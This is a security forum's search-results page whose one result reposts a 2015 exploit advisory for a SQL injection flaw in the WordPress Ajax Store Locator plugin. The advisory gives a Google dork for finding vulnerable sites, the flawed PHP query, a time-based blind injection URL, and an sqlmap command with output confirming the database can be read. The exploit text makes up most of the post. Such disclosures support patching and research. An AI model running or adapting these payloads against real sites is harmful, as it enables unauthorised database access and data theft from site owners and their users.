Jump to content

Search the Community

Showing results for tags 'tests'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Occupation


Interests


Biography


Location

Found 1 result

  1. ###################### # Exploit Title : Wordpress Ajax Store Locator <= 1.2 SQL Injection Vulnerability # Exploit Author : Claudio Viviani # Vendor Homepage : WordPress - Ajax Store Locator - Wordpress | CodeCanyon # Software Link : Premium # Dork Google: inurl:ajax-store-locator # index of ajax-store-locator # Date : 2015-03-29 # Tested on : Windows 7 / Mozilla Firefox # Linux / Mozilla Firefox ###################### # Info: The "sl_dal_searchlocation_cbf" ajax function is affected from SQL Injection vulnerability "StoreLocation" var is not sanitized # PoC Exploit: http://TARGET/wordpress/wp-admin/admin-ajax.php?action=sl_dal_searchlocation&funMethod=SearchStore&Location=Social&StoreLocation=1~1 AND (SELECT * FROM (SELECT(SLEEP(10)))LCKZ) StoreLocation's value must contain "~" delimiter $storeLoc = $_REQUEST["StoreLocation"]; ... ... $qryVal = explode("~", $storeLoc); $sql_query = "SELECT a.*,b.*, 0 as ......... LEFT JOIN `$sl_tb_pluginset` as b ON (1=1) WHERE a.id=$qryVal[1]" # PoC sqlmap: sqlmap -u "http://TARGET/wordpress/wp-admin/admin-ajax.php?action=sl_dal_searchlocation&funMethod=SearchStore&Location=Social&StoreLocation=1~1" -p StoreLocation --dbms mysql [18:24:11] [iNFO] GET parameter 'StoreLocation' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' injectable for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] [18:24:18] [iNFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' [18:24:18] [iNFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found [18:24:24] [iNFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns' [18:24:29] [iNFO] checking if the injection point on GET parameter 'StoreLocation' is a false positive GET parameter 'StoreLocation' is vulnerable. Do you want to keep testing the others (if any)? [y/N] sqlmap identified the following injection points with a total of 89 HTTP(s) requests: --- Parameter: StoreLocation (GET) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: action=sl_dal_searchlocation&funMethod=SearchStore&Location=Social&StoreLocation=1~1 AND (SELECT * FROM (SELECT(SLEEP(5)))LCKZ) --- [18:29:48] [iNFO] the back-end DBMS is MySQL web server operating system: Linux CentOS 5.10 web application technology: PHP 5.3.3, Apache 2.2.3 back-end DBMS: MySQL 5.0.12 ##################### Discovered By : Claudio Viviani HomeLab IT - Virtualization, Security, Linux Blog - Virtualization, Security, Linux Blog archive_exploit Archives - HomeLab IT - Virtualization, Security, Linux Blog (Full HomelabIT Archive Exploit) F.F.H.D - Free Fuzzy Hashes Database (Free Fuzzy Hashes Database) info@homelab.it homelabit@protonmail.ch https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww ##################### Source: http://packetstorm.wowhacker.com/1504-exploits/wpajaxstorelocator-sql.txt
×
×
  • Create New...